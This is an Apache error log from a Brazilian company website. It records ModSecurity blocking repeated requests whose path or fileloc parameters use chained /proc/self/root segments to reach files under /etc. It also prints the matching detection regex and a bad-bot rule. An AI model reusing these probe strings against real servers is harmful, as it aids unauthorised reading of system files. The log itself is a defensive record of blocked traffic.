https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:32:32.057981 2026] [proxy_fcgi:error] [pid 19507:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:41364] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:32:47.428312 2026] [:error] [pid 6296:tid 140411632822016] [client 216.73.216.191:4967] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmsX3Ik7brgkOH-rIWa_wAAAU0"]
[Tue Mar 17 16:32:55.131724 2026] [proxy_fcgi:error] [pid 2473:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41670] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:33:06.418624 2026] [:error] [pid 29151:tid 140411716749056] [client 74.7.243.128:43570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmscvPqhzTj3BvfDX-WzAAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:33:08.511151 2026] [:error] [pid 2473:tid 140411725141760] [client 216.73.216.191:18171] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmsdKBJNF7axNlVR0UnhgAAAAI"]
[Tue Mar 17 16:33:13.885000 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.241.31:39238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmseaBJNF7axNlVR0UniQAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:33:19.045938 2026] [proxy_fcgi:error] [pid 6296:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41992] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:33:30.808365 2026] [:error] [pid 25836:tid 140411716749056] [client 216.73.216.191:38492] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmsioh-PF_25v4hFRB6HwAAAQM"]
[Tue Mar 17 16:33:41.121763 2026] [proxy_fcgi:error] [pid 18380:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42326] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:33:45.432494 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:36372] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmsmdY0UrI5A3LftIwMVgAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:34:03.128014 2026] [proxy_fcgi:error] [pid 2473:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42686] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:34:07.802478 2026] [:error] [pid 2598:tid 140411632822016] [client 74.7.244.43:49708] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmsrxj0p0SRWAqcjGGI7gAAAw0"]
[Tue Mar 17 16:34:11.960672 2026] [:error] [pid 29151:tid 140411733534464] [client 74.7.241.31:37844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmss_PqhzTj3BvfDX-W6AAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:34:14.772500 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.241.31:42584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmstgeiSKl8TjouI-Ym8wAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:34:25.131034 2026] [proxy_fcgi:error] [pid 29151:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:43010] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:34:26.943040 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:48748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmswta6ubjKNq_cu4YXdwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:34:38.134233 2026] [:error] [pid 7004:tid 140411691570944] [client 74.7.228.61:57774] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmszsU6Sx0TG1YjmQi9zwAAAoY"]
[Tue Mar 17 16:34:39.792551 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.241.31:58640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmsz6BJNF7axNlVR0UnpgAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:34:42.255527 2026] [:error] [pid 29151:tid 140411716749056] [client 74.7.241.31:39414] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abms0vPqhzTj3BvfDX-W8gAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:34:44.591198 2026] [:error] [pid 2598:tid 140411574073088] [client 74.7.241.31:39416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abms1Bj0p0SRWAqcjGGI9gAAAxQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:34:46.141815 2026] [proxy_fcgi:error] [pid 25836:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43316] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:34:48.991720 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.241.31:33614] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abms2KBJNF7axNlVR0UnqAAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:34:52.783394 2026] [:error] [pid 29151:tid 140411699963648] [client 74.7.241.31:33628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abms3PPqhzTj3BvfDX-W9QAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:34:54.111934 2026] [:error] [pid 29151:tid 140411540502272] [client 74.7.241.31:33628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abms3vPqhzTj3BvfDX-W9gAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:35:06.567196 2026] [:error] [pid 29151:tid 140411733534464] [client 74.7.241.31:33642] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abms6vPqhzTj3BvfDX-XAwAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:35:09.121846 2026] [proxy_fcgi:error] [pid 2598:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:43664] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:35:10.027272 2026] [:error] [pid 18380:tid 140411599251200] [client 74.7.241.31:34188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abms7q4xEDsg_V3ESNZangAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:35:16.505968 2026] [:error] [pid 6296:tid 140411691570944] [client 74.7.241.31:34202] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abms9HIk7brgkOH-rIWbNQAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:35:21.458529 2026] [:error] [pid 6296:tid 140411574073088] [client 74.7.241.31:58528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abms-XIk7brgkOH-rIWbOQAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:35:24.634349 2026] [:error] [pid 18380:tid 140411624429312] [client 74.7.243.128:41732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abms_K4xEDsg_V3ESNZapAAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
